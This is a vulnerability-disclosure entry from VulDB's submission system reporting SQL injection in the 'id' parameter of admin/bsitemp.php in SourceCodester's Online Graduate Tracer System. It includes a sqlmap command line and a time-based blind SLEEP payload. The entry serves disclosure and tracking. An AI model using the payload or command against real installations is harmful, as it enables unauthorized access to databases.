Submit #101295: Online Graduate Tracer System bsitemp.php sql injectioninfo

TitelOnline Graduate Tracer System bsitemp.php sql injection
BeschreibungOnline Graduate Tracer System bsitemp.php sql injection url:admin/bsitemp.php Abstract: Line 243 of bsitemp.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands. Explanation: SQL injection errors occur when: 1. Data enters a program from an untrusted source. 2. The data is used to dynamically construct a SQL query. In this case, the data is passed to mysqli_query() in bsitemp.php on line 243. sqlmap.py -u "http://localhost/tracking/admin/bsitemp.php?id=111" --level 5 --risk 3 --current-db Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=111'+(SELECT 0x67437261 WHERE 6269=6269 AND (SELECT 8178 FROM (SELECT(SLEEP(5)))mMBg))+' Download Code: https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html
Quelle⚠️ https://blog.csdn.net/Dwayne_Wade/article/details/129522869
Benutzer
 bit3hh (UID 42576)
Einreichung14.03.2023 05:04 (vor 3 Jahren)
Moderieren14.03.2023 15:31 (10 hours later)
StatusAkzeptiert
VulDB Eintrag222981 [SourceCodester Online Graduate Tracer System 1.0 bsitemp.php mysqli_query ID SQL Injection]
Punkte20

Want to know what is going to be exploited?

We predict KEV entries!